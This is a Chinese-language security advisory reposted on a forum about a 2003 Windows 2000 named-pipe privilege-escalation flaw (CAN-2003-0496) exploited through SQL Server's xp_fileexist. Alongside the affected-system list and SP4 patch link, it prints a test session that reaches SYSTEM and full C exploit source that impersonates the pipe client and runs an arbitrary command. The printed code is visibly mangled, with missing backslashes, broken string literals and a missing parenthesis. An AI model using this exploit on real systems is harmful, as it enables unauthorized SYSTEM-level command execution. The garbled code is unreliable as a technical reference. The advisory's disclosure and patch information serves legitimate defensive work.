Microsoft Windows CreateFile API命名管道权限提升漏洞

touch_itpub

发布时间：2003-07-08\n更新时间：2003-07-15\n严重程度：高\n威胁程度：本地管理员权限\n错误类型：设计错误\n利用方式：服务器模式\n\nBUGTRAQ ID：8128\nCVE(CAN) ID：CAN-2003-0496\n\n受影响系统\nMicrosoft Windows 2000 Advanced Server SP3        \nMicrosoft Windows 2000 Advanced Server SP2        \nMicrosoft Windows 2000 Advanced Server SP1        \nMicrosoft Windows 2000 Advanced Server            \nMicrosoft Windows 2000 Datacenter Server SP3      \nMicrosoft Windows 2000 Datacenter Server SP2      \nMicrosoft Windows 2000 Datacenter Server SP1      \nMicrosoft Windows 2000 Datacenter Server          \nMicrosoft Windows 2000 Professional SP3           \nMicrosoft Windows 2000 Professional SP2           \nMicrosoft Windows 2000 Professional SP1           \nMicrosoft Windows 2000 Professional               \nMicrosoft Windows 2000 Server SP3                 \nMicrosoft Windows 2000 Server SP2                 \nMicrosoft Windows 2000 Server SP1                 \nMicrosoft Windows 2000 Server                     \nMicrosoft Windows 2000 Terminal Services SP3      \n   +Microsoft Windows 2000 Advanced Server SP3    \n   +Microsoft Windows 2000 Datacenter Server SP3  \n   +Microsoft Windows 2000 Server SP3             \nMicrosoft Windows 2000 Terminal Services SP2      \n   +Microsoft Windows 2000 Advanced Server SP2    \n   +Microsoft Windows 2000 Datacenter Server SP2  \n   +Microsoft Windows 2000 Server SP2             \nMicrosoft Windows 2000 Terminal Services SP1      \n   +Microsoft Windows 2000 Advanced Server SP1    \n   +Microsoft Windows 2000 Datacenter Server SP1  \n   +Microsoft Windows 2000 Server SP1             \nMicrosoft Windows 2000 Terminal Services          \n   +Microsoft Windows 2000 Advanced Server        \n   +Microsoft Windows 2000 Datacenter Server      \n   +Microsoft Windows 2000 Server\n未影响系统\nMicrosoft Windows 2000 Advanced Server SP4      \nMicrosoft Windows 2000 Datacenter Server SP4    \nMicrosoft Windows 2000 Professional SP4         \nMicrosoft Windows 2000 Server SP4               \nMicrosoft Windows 2000 Terminal Services SP4    \n   +Microsoft Windows 2000 Advanced Server SP4  \n   +Microsoft Windows 2000 Datacenter Server SP4\n   +Microsoft Windows 2000 Server SP4\n详细描述\nMicrosoft Windows未能正确处理CreateFile API建立的命名管道，当以此命名管道作为参数传递给SQL Server的xp_fileexist存储过程时会导致攻击者以SQL进程的权限执行任意命令。\n\n测试代码\nC:>mssqlpipe.exe cmd.exe\nCreating pipe: .Pipeatstake\nPipe created, waiting for connectection\nConnect to the database (with isql for example) and execute:\nxp_fileexist /SERVERNAMEpipeatsstake/\n\nThen in command shell #2:\n\nC:>isql -U andreas\nPassword:\n1> xp_fileexist /TEMP123pipeatstake/\n2> go\nFile Exists File is a Directory Parent Directory Exists\n----------- ------------------- -----------------------\n1 0 1\n\nThen, back in command shell #1:\n\nImpersonate user successful, we are running as user: SYSTEM\n\n/*  tac0tac0.c - pay no attention to the name, long\nstory...\n  *\n  *  Author:  Maceo\n  *  Modified to take advantage of CAN-2003-0496 Named\nPipe Filename\n  *  Local Privilege Escalation Found by @stake. Use with\ntheir Advisory.\n  *  -wirepair@sh0dan.org http://sh0dan.org\n  *\n  *\n  *  All credits for code go to Maceo, i really did\nminimal work\n  *  with his code, it took me like 3 seconds heh.\n  *  Shouts to #innercircle,\n  *\n  */\n\n\n#include <stdio.h>\n#include <windows.h>\n\n\nint main(int argc, char **argv)\n{\n   DWORD dwNumber = 0;\n   DWORD dwType = REG_DWORD;\n   DWORD dwSize = sizeof(DWORD);\n\n   if (argc != 2) {\n      fprintf(stderr, \"Usage: %s <cmd.exe>\nNamed Pipe Local\nPriv Escalation found by @stake.\n\"\n                       \"This code is to be used with MS-SQL exactly as\noutlined in their advisory\n\"\n                       \"All credit for this code goes to Maceo, he did a\nfine job.. -wire\n\",argv[0]);\n                       exit(1);\n   }\n   // build the next named pipe name //\n   char szPipe[64];\n   //sprintf(szPipe, \"\\.pipe\netNtControlPipe%lu\",\n++dwNumber);\n   sprintf(szPipe, \"\\.pipepoop\";\n\n   // create the named pipe before scm can //\n   HANDLE hPipe = 0;\n   hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,\n                            PIPE_TYPE_MESSAGE|PIPE_WAIT,\n                            2, 0, 0, 0, NULL);\n   if (hPipe == INVALID_HANDLE_VALUE)\n   {\n     printf (\"Failed to create named pipe:\n  %s\n\",\nszPipe);\n     return 3;\n   }\n\n\n   ConnectNamedPipe (hPipe, NULL);\n\n   // assume the identity of the client //\n   if (!ImpersonateNamedPipeClient (hPipe))\n   {\n     printf (\"Failed to impersonate the named pipe.\n\";\n     CloseHandle(hPipe);\n     return 5;\n   }\n\n\n   // display impersonating users name //\n   dwSize  = 256;\n   char szUser[256];\n   GetUserName(szUser, &dwSize);\n   printf (\"Impersonating: %s\n\", szUser);\n\n   system(argv[1]);\n   CloseHandle(hPipe);\n   return 0;\n}\n\n解决方案\n厂商已经在最新的补丁包中修补了此漏洞：\n\nMicrosoft Windows 2000 Server SP3:\n      Microsoft Upgrade Windows 2000 SP4\n      http://www.microsoft.com/windows ... cks/sp4/default.asp\n\n相关信息\nNamed Pipe Filename Local Privilege Escalation\nhttp://www.atstake.com/research/advisories/2003/a070803-1.txt